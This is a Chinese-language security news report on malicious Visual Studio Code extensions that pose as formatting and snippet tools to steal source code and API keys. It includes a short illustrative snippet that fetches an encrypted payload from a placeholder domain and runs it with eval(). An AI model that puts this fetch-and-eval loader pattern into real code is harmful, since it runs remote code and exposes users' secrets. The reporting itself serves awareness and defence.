安全客周刊 04月09日 14:30
紧急警报! 恶意 VS Code 扩展程序伪装升级,开发者面临巨大风险
index_new5.html
../../../zaker_core/zaker_tpl_static/wap/tpl_guoji1.html

 

近期,网络安全研究人员揭示了一场针对软件开发者的恶意攻击活动,攻击者通过伪装成实用工具的 Visual Studio Code 扩展程序,秘密执行恶意代码,窃取源代码、API密钥等敏感信息,甚至在软件中植入后门。这些扩展程序主要针对JavaScript和Python开发者,利用VS Code的扩展生态系统传播,且具备逃避检测、持续潜伏的能力,表明背后存在有组织的威胁。攻击者采用多阶段感染机制,通过下载加密的有效载荷并执行恶意代码,绕过静态代码分析,给开发者带来了严重的安全威胁。

💻 恶意扩展程序伪装成代码格式化、代码片段生成等工具,诱导JavaScript和Python开发者安装。

🔑 一旦安装,扩展程序可访问本地文件,窃取源代码、API密钥等敏感信息,甚至在软件中植入后门。

🛡️ 攻击者采用多阶段感染机制,下载加密的有效载荷,并使用JavaScript的eval()函数解密和执行恶意代码,以绕过安全检测。

🕵️‍♂️ 恶意扩展程序具备反分析能力,会检查调试环境和安全工具,增加检测难度。

🌐 攻击利用了VS Code强大的扩展生态系统,由于扩展程序数量众多,微软的安全审查面临挑战。

发布时间 : 2025-04-09 14:23:33

网络安全研究人员发现了一场令人不安的攻击活动,该活动通过恶意的 Visual Studio Code 扩展程序来针对软件开发人员,这些恶意扩展程序累计已被安装了数百万次。

这些被篡改的扩展程序伪装成合法的提高工作效率的工具,在开发人员专注于编程任务时,秘密地执行恶意代码。

这些扩展程序在隐藏其真实目的的同时,看起来功能完备,由于它们在行业内最受信任的开发环境之一中运行,因此格外危险。

这场恶意软件攻击活动主要针对的是 JavaScript 和 Python 开发人员,这些扩展程序声称具备代码格式化、代码片段生成以及自动化功能等特性。

一旦安装,这些扩展程序就能访问本地文件,有可能窃取存储在开发环境中的源代码、应用程序编程接口(API)密钥以及其他敏感信息。

安全专家警告称,这些扩展程序有可能在软件开发过程中为软件创建后门,从而在生产系统中引入漏洞。

ExtensionTotal 的分析师兼研究员 Yuval Ronen 指出,这次攻击的复杂性表明,背后是有组织的威胁行为者,而不是机会主义的黑客。

Ronen 在分析了几个恶意扩展程序后解释道:“这些扩展程序不仅仅是在窃取凭据;它们被设计为能够保持持续存在,并有可能引入一些细微的漏洞,这些漏洞日后可能会被用于攻击已部署的应用程序。”

这次攻击利用了 Visual Studio Code 强大的扩展生态系统,该生态系统允许开发人员使用数千个由社区创建的工具来自定义他们的开发环境。

尽管 Microsoft 实施了安全措施,但扩展程序数量众多,给全面审查带来了挑战。

许多恶意扩展程序最初进入市场时代码是干净的,只是后来通过更新引入了恶意功能。

感染机制揭示了先进的技术手段

主要的感染机制采用了多阶段的方法来逃避检测。

最初,扩展程序在加载合法功能的同时,会下载一个伪装成配置数据的加密有效载荷。

然后,这个有效载荷会使用 JavaScript 的 eval () 函数进行解密和执行:

const decrypt = (data, key) => {

// 解密逻辑

return decryptedPayload;};

const config = await fetch(‘https://legitimate-looking-domain.com/config.json’);const payload = decrypt(config.data, process.env.SOME_ENV_VAR);eval(payload); // 执行恶意代码

这种技术使得恶意软件能够绕过静态代码分析工具,因为恶意代码从未直接出现在扩展程序的源代码中。

这些扩展程序在部署其有效载荷之前,还会检查调试环境和安全工具,显示出了复杂的反分析能力。

商务合作,文章发布请联系 anquanke@360.cn

安全客

Fish AI Reader

Fish AI Reader

AI辅助创作,多种专业模板,深度分析,高质量内容生成。从观点提取到深度思考,FishAI为您提供全方位的创作支持。新版本引入自定义参数,让您的创作更加个性化和精准。

FishAI

FishAI

鱼阅,AI 时代的下一个智能信息助手,助你摆脱信息焦虑

联系邮箱 441953276@qq.com

相关标签

VS Code 恶意扩展程序 安全攻击 软件开发
相关文章